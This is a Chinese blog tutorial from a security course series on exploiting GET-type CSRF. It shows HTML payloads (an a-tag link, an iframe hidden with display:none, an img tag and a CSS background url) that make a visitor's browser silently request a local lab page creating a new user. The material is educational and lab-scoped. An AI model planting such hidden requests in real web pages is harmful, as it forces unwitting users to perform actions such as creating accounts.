【安全】P 5-6 GET型CSRF漏洞利用方法

本文详细介绍了HTML的a标签、iframe标签、img标签以及CSS背景图片中的url属性如何被利用来进行CSRF(跨站请求伪造)攻击。通过这些元素,攻击者可以在用户不知情的情况下,触发对指定URL的请求,执行潜在的恶意操作,如创建新用户等。同时,文章提到了如何通过设置display:none来隐藏iframe内容,以及利用img标签和CSS背景图片发起无感知的请求。
摘要由CSDN通过智能技术生成

0X01 链接利用

在html中,a标签代表链接,可以将当前的”焦点” 指引到其他位置。
移动的“焦点”需要发送对应的请求到链接指向的地址,然后返回响应。

<a href = “请求地址,会被http 请求到的位置,可以携带GET型参数”> 内容 </a>
<a href = “http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456”>请点击我</a>

在这里插入图片描述

0X02 iframe利用

iframe标签内容将在页面加载过程中自动进行加载, src指向的位置就是页面请求的位置
注意:可以设置iframe 的 style -> display:none,以此来不显示iframe加载的内容。

<iframe src=”http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456” style=”display:none” />

在这里插入图片描述

0X03 img标签利用

img标签的内容会随着页面加载而被请求,以此src指向的位置会在页面加载过程中进行请求。

<img src=”http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456” />

在这里插入图片描述

0X04 CSS-backgroud利用

可以利用 CSS中 background样式中的url来加载远程机器上的内容,从而对url中的内容发送HTTP请求
例如:

body
  {
  background: #00FF00 url(bgimage.gif) no-repeat fixed top;
  }

可以利用 CSS中 background样式中的url来加载远程机器上的内容,从而对url中的内容发送HTTP请求
例如:

body
  {
  background: #00FF00 url(“http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456”) no-repeat fixed top;
  }

在这里插入图片描述

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值